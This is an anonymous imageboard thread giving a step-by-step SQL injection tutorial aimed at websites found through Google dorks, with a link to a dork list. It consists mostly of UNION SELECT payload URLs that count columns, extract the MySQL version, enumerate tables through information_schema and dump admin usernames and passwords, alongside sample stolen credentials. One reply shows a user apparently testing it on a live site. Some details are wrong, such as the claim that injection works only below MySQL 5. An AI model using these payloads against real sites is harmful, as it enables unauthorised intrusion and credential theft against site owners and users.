/hf/ - /hf/ - SQLi (part 1)

Email
Comment *
File	Select/drop/paste files here
* = required field	[▶ Show post options & limits] Confused? See the FAQ.

Options	Do not bump (you can also write sage in the email field) Spoiler images (this replaces the thumbnails of your images with question marks)
Password	(For file and post deletion.)
Allowed file types:jpg, jpeg, gif, png, webm, mp4, pdf Max filesize is 8 MB. Max image dimensions are 10000 x 10000. You may upload 3 per post.

File: 1422266003394.jpg (41.7 KB, 404x256, 101:64, sqli.jpg)

/hf/ - SQLi (part 1) Anonymous 01/26/15 (Mon) 09:53:23 No.40

SQL injection is a code injection technique, in which malicious SQL statements are inserted into an entry field for execution.
What you'll need -

*A list of dorks, I got these for you:
http://www.mediafire.com/download/lzy8cjo52xct1m4/Dorks.txt

*A functioning brain (50% of you can stop reading here)

We'll be covering manual and blind SQLi injection, No Havij.

Step №1 - Check for vulnerability
You can either use a vulnerability scanner or manually check websites, it's up to you.

Using the lists of dork, find a website, let's say we found www.halfchan.org/news.php?id=4
We add an apostrophe to the end of the URL and hope it relays a SQL error back to us.

www.halfchan.org/news.php?id=4
becomes
www.halfchan.org/news.php?id=4'
An indication of a vulnerable website is a message along the lines of;
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server"

Great, halfchan is vulnerable and ready to be injected.

Step №2 - Find number of columns
Finding a number of columns is usually achieved by declaring the ORDER BY statement, we will keep constant increments until we get a relayed error

www.halfchan.org/news.php?id=4 order by 1/* <– no error
www.halfchan.org/news.php?id=4 order by 2/* <– no error
www.halfchan.org/news.php?id=4 order by 3/* <– no error
www.halfchan.org/news.php?id=4 order by 4/* <– error (we get a relayed message along the lines of Unknown column ‘4′ in ‘order clause’)
We do not count the last table because it does not exist, so we have 3 columns.

Step №3 - Discover UNION
We declare UNION statement at the end of the URL to find out which tables are vulnerable
www.halfchan.org/news.php?id=4 union all select 1,2,3/*

Step №4 - Extract SQL Version
Our UNION command told us that table 2 is vulnerable, so we will use that table to extract the version, it's important to understand that SQLi only works on MySQL versions below 5

Replace the vulnerable number table with @@version, our vulnerable table is two, so we remove the 2 from the URL and insert @@version in order to relay the MySQL version back to us

www.halfchan.org/news.php?id=4 union all select 1,@@version,3/*

In case the server does not relay the MySQL version back to you, we declare convert() function in order to bypass the error, in case it's caused by unicode issues.

www.halfchan.org/news.php?id=4 union all select 1,convert(@@version using latin1),3/*
If the server still refuses to relay the version, which probably means the charset is not set to default, we can try bypassing it with this additional syntax

www.halfchan.org/news.php?id=4 union all select 1,unhex(hex(@@version)),3/*

At last, we have our version, it's below 5 and we can carry on.

Step №5 - Obtaining tables and columns names manually
This is a straining and boring step, which is why I recommend getting Havij to do it for you, however, the basics are important.

Common table names: user(s), admin(s), member(s) - these also happen to be the tables we will need to get some tasty information.

Common column names: username, user, usr, user_name, password, pass, passwd, pwd

Attempting to relay one of the tables is simple, and will look like this
www.halfchan.org/news.php?id=4 union all select 1,2,3 from admin/*

If the table exists, relaying a column is also simple, and will look like this
www.halfchan.org/news.php?id=4 union all select 1,username,3 from admin/*

This is a guessing game, so either start guessing or use Havij to guess for you.

By some miracle, we got admins table and username column right, and all the usernames are displayed:
Noot
Janitor
Janitor2
Janitor3
User
User
User
User
User

Great, now we know the halfchan's administrator username, Noot.

Getting the password depends on how the database is set up, sometimes they're unecrypted and are plain text, and sometimes they're md5 hashed, I've seen it all.

By now you should know how to maneuver around tables and columns, so we head over to the passwords column

www.halfchan.org/news.php?id=4 union all select 1,password,3 from admin/*

This usually relays a large string of confusing wall of text, it can be re-arranged to look all pretty and nice using the concat statement

www.halfchan.org/news.php?id=4 union all select 1,concat(username,0×3a,password),3 from admin/* (0×3a is a hash value for colon (:) which will separate our usernames and passwords from the admin table.)
Noot:ILoveBigCocks
Janitor:123456
Janitor2:password
Janitor3:8chanisbetter
User:41241251
And so forth.

If your keyboard has no : because you're finnish or something, you can use ascii aswell.
www.halfchan.org/news.php?id=4 union all select 1,concat(username,char(58),password),3 from admin/*

A last resort if you cannot guess tables or columns would be using mysql.user as default.

part 2 next reply

Anonymous 01/26/15 (Mon) 10:06:58 No.41

If the MySQL version is above 5, we have a different approach to injecting.
If you're familiar with MySQL you know all all tables and columns are held by information_schema
In order to get our tables now, we use table_name and information_schema.tables statements.

We keep using the union statement, and we use our previous vulnerable table as our key once again, making a table_name request and pinpointing the information_schema.tables route.
/* is a popular commenting method on many languages, MySQL shares this, this allows us to bypass pesky warnings and errors.

www.halfchan.org/news.php?id=4 nion all select 1,table_name,3 from information_schema.tables/*
This will not display the information we want properly because we didn't limit it, we add the limit statement.

www.halfchan.org/news.php?id=4 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note the 0,1 = getting 1 result starting from the 0th line.
Change this accordingly to display the information you want.

www.halfchan.org/news.php?id=4 union all select 1,table_name,3 from information_schema.tables limit 1,1/* - Second table is displayed, the third table is 2,1, and so forth.

Keep increment on those values until we find useful tables, db_admin, poll_user, auth, auth_user, etc.

Getting the column names is exactly the same.
www.halfchan.org/news.php?id=4 union all select 1,column_name,3 from information_schema.columns limit 0,1/* - with the only change is the statement we declare, keep increment on those values until we find useful columns, username, user, login, password, pass, passwd, apass, etc.

If you need to display a specific table you can use a simple query.
www.halfchan.org/news.php?id=4 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/* - this will display the column "name" in the table "users", using a simple LIMIT we can display all information needed.

This will NOT work if Magic Quotes are enabled on MySQL.

We get all the information in a giant wall of text, or a disorganized list, we use the previous concat() function to make it all pretty and nice, again.

www.halfchan.org/news.php?id=4 union all select 1,concat(user,0×3a,pass,0×3a,email) from users/*
Using ascii works here, too, instead of 0x3a, this will group up the information from the table 'users'
Usually looks like this:
noot:hash:noot@halfchan.org

Blind SQL Injection - A more complicated approach to a complicated issue, I will write this soon.

Anonymous 04/02/15 (Thu) 19:21:19 No.87

>>41
>>40
Awesome post op

Anonymous 07/12/15 (Sun) 20:26:11 No.98

>A functioning brain (50% of you can stop reading here)

Epic, simply epic.

Anonymous 01/02/16 (Sat) 09:17:21 No.103

epin

Anonymous 02/23/16 (Tue) 15:39:19 No.116

Interesting stuff.

Anonymous 03/10/16 (Thu) 15:06:12 No.144

LOL Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source, but they closed the source code in 2005 and removed the free "Registered Feed" version in 2008. It now costs $2,190 per year, which still beats many of its competitors. A free “Nessus Home” version is also available, though it is limited and only licensed for home network use.

Nessus is constantly updated, with more than 70,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a web-based interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. Read 16 reviews.

Latest release: version 6.3.3 on March 16, 2015 (12 months ago).

Anonymous 03/10/16 (Thu) 15:16:37 No.145

Would this be the error in step2 - the 'order by'?

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home1/zeoworks/public_html/game.php on line 21